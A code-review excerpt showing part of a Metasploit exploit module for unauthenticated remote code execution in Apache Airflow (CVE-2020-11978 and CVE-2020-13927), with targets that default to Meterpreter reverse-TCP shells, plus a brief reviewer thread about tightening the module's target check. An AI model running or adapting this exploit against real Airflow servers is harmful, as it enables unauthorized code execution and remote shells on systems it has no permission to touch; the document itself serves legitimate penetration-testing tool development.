modules/exploits/multi/http/apache_airflow_dag_rce.rb

```diff
@@ -0,0 +1,265 @@
+          Experimental REST API to perform malicious actions such as creating the
+          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation
+          and command injection, leading to unauthenticated remote code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xuxiang',            # Original discovery and CVE submission
+          'Pepe Berba',         # ExploitDB author
+          'Ismail E. Dawoodjee' # Metasploit module author
+        ],
+        'References' => [
+          [ 'EDB', '49927' ],
+          [ 'CVE', '2020-11978' ],
+          [ 'CVE', '2020-13927' ],
+          [ 'URL', 'https://github.com/pberba/CVE-2020-11978/' ],
+          [ 'URL', 'https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx' ],
+          [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],
+        ],
+        'Platform' => ['linux', 'unix', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows PowerShell Command',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-07-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'PatchedVersion' => [Rex::Version.new('1.10.11')],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptString.new('DAG_PATH', [
+          true,
+          'Path to vulnerable example DAG',
+          '/api/experimental/dags/example_trigger_target_dag'
+        ]),
+        OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])
+      ]
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')
+    print_status("Checking target web server for a response at: #{full_uri(uri)}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 && res.body.downcase.include?('airflow')
```

Comment:
Maybe add a tad more text to the check?

Reply:
Do you mean something like `res.body.downcase.include?('apache airflow')` or a more robust check using additional text from the app? I'm not sure if I follow

Reply:
Additional text from the app, so that it doesn't match a random blogpost mentioning `airflow`. :)

Reply:
Ah, fair enough. Can't be too sure these days with data science blogs about Airflow